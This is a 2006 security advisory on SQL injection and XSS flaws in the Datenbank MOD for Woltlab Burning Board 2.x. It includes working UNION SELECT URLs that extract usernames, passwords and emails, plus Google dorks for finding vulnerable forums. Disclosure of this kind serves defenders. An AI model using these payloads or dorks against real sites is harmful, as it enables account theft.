woltlabBB2x.txt

`--Security Report--  
Advisory: Woltlab Burning Board 2.x (Datenbank MOD fileid) Multiple  
Vulnerabilities.  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 01/03/06 01:33 AM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: [email protected]  
Web: http://www.nukedx.com  
}  
---  
Vendor: WbbCoderForum (http://www.wbbcoderforum.de)  
Version: Datenbank MOD 2.7 and prior versions must be affected.  
About: Via this method remote attacker can inject arbitrary SQL queries to  
fileid parameter in this mod if  
magic_quotes_gpc = on, if magic_quotes_gpc off remote attacker can make  
malicious links for clicking and  
when victim clicks this links victim's browser would be inject with XSS.  
Level: Critical  
MOD Pages: info_db.php , database.php  
---  
How&Example:  
GPC  
GET ->  
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1/**/[SQL/XSS]  
EXAMPLE ->  
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,  
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1  
GET ->  
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1/**/[SQL/XSS]  
EXAMPLE ->  
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,  
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1  
with this examples remote attacker can leak speficied users login information  
from database.  
---  
Timeline:  
* 01/03/2006: Vulnerability found.  
* 01/03/2006: Contacted with vendor and waiting reply.  
---  
Exploit:  
http://www.nukedx.com/?getxpl=17  
---  
Dorks: inurl:info_db.php , inurl:/wbb2/info_db.php , inurl:/board/info_db.php,  
inurl:database.php , inurl:/wbb2/database.php , inurl:/board/database.php  
allintext:Datenbank Trooper WbbCoderForum.de etc. etc.  
---  
Original advisory: http://www.nukedx.com/?viewdoc=17  
  
`